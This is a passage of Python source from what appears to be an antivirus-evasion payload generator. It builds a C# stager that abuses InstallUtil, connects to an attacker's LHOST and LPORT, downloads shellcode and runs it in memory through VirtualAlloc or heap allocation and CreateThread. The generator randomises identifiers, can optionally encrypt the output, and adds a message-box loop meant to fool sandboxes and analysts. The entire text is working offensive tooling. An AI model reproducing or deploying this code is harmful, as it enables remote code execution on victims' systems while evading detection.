payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
y[10], y[11], y[12], y[13], y[14], y[15], y[16])
if self.required_options["USE_ARYA"][0].lower() == "y":
payload_code = encryption.arya(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# get random variables for the API imports
r = [bypass_helpers.randomString() for x in range(16)]
y = [bypass_helpers.randomString() for x in range(17)]
# installutil random class variables
getDataName = helpers.randomString()
className = bypass_helpers.randomString()
classNameTwo = bypass_helpers.randomString()
classNameThree = bypass_helpers.randomString()
execName = bypass_helpers.randomString()
savedStateName = bypass_helpers.randomString()
#required syntax at the beginning of any/all payloads
payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.Configuration.Install; using System.Windows.Forms;\n"
payload_code += "\tpublic class {0} {{\n".format(className)
payload_code += "\t\tpublic static void Main()\n\t\t{\n"
# lets add a message box to throw offf sandbox heuristics and analysts :)
# there is no decryption routine, troll.level = 9000
# TODO: add a fake decryption function that does nothing and accepts messWithAnalystName as a parameter.
payload_code += "\t\t\twhile(true)\n{{ MessageBox.Show(\"doge\"); Console.ReadLine();}}\n"
payload_code += "\t\t}\n\t}\n\n"
payload_code += "\t[System.ComponentModel.RunInstaller(true)]\n"
payload_code += "\tpublic class {0} : System.Configuration.Install.Installer\n\t{{\n".format(
classNameTwo)
payload_code += "\t\tpublic override void Uninstall(System.Collections.IDictionary {0})\n\t\t{{\n".format(
savedStateName)
payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format(
classNameThree, execName)
payload_code += "\n\tpublic class {0}\n\t{{".format(classNameThree)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % (
r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
r[10], r[11])
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % (
y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
y[10], y[11], y[12], y[13], y[14], y[15], y[16])
hostName = helpers.randomString()
portName = helpers.randomString()
ipName = helpers.randomString()
sockName = helpers.randomString()
length_rawName = helpers.randomString()
lengthName = helpers.randomString()
sName = helpers.randomString()
total_bytesName = helpers.randomString()
handleName = helpers.randomString()
payload_code += "static byte[] %s(string %s, int %s) {\n" % (
getDataName, hostName, portName)
payload_code += " IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % (
ipName, hostName, portName)
payload_code += " Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" % (
sockName)
payload_code += " try { %s.Connect(%s); }\n" % (sockName, ipName)
payload_code += " catch { return null;}\n"
payload_code += " byte[] %s = new byte[4];\n" % (length_rawName)
payload_code += " %s.Receive(%s, 4, 0);\n" % (sockName,
length_rawName)
payload_code += " int %s = BitConverter.ToInt32(%s, 0);\n" % (
lengthName, length_rawName)
payload_code += " byte[] %s = new byte[%s + 5];\n" % (sName,
lengthName)
payload_code += " int %s = 0;\n" % (total_bytesName)
payload_code += " while (%s < %s)\n" % (total_bytesName, lengthName)
payload_code += " { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" % (
total_bytesName, sockName, sName, total_bytesName, lengthName,
total_bytesName, lengthName, total_bytesName)
payload_code += " byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % (
handleName, sockName)
payload_code += " Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % (
handleName, sName, sName)
payload_code += " return %s;}\n" % (sName)
# code fo the inject() function to inject shellcode
injectName = bypass_helpers.randomString()
sName = bypass_helpers.randomString()
funcAddrName = bypass_helpers.randomString()
hThreadName = bypass_helpers.randomString()
threadIdName = bypass_helpers.randomString()
pinfoName = bypass_helpers.randomString()
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "static void %s(byte[] %s) {\n" % (injectName,
sName)
payload_code += " if (%s != null) {\n" % (sName)
payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
funcAddrName, sName)
payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
sName, funcAddrName, sName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" % (
hThreadName)
payload_code += " UInt32 %s = 0;\n" % (threadIdName)
payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
hThreadName, funcAddrName, pinfoName, threadIdName)
payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (
hThreadName)
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "static void %s(byte[] %s) {\n" % (injectName,
sName)
payload_code += " if (%s != null) {\n" % (sName)
payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
pinfoName, sName)
payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
funcAddrName, pinfoName, sName)
payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
funcAddrName, sName, sName)
payload_code += ' UInt32 {} = 0;\n'.format(threadIdName)
payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
hThreadName, funcAddrName, threadIdName)
payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(
hThreadName)
sName = bypass_helpers.randomString()
num_tabs_required = 0
payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName)
payload_code2, num_tabs_required = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
num_tabs_required += 2
payload_code += " byte[] %s = null; %s = %s(\"%s\", %s);\n" % (
sName, sName, getDataName, self.required_options["LHOST"][0],
self.required_options["LPORT"][0])
payload_code += " %s(%s);\n" % (injectName, sName)
while (num_tabs_required != 0):
payload_code += '\t' * num_tabs_required + '}'
num_tabs_required -= 1
self.payload_source_code = payload_code
return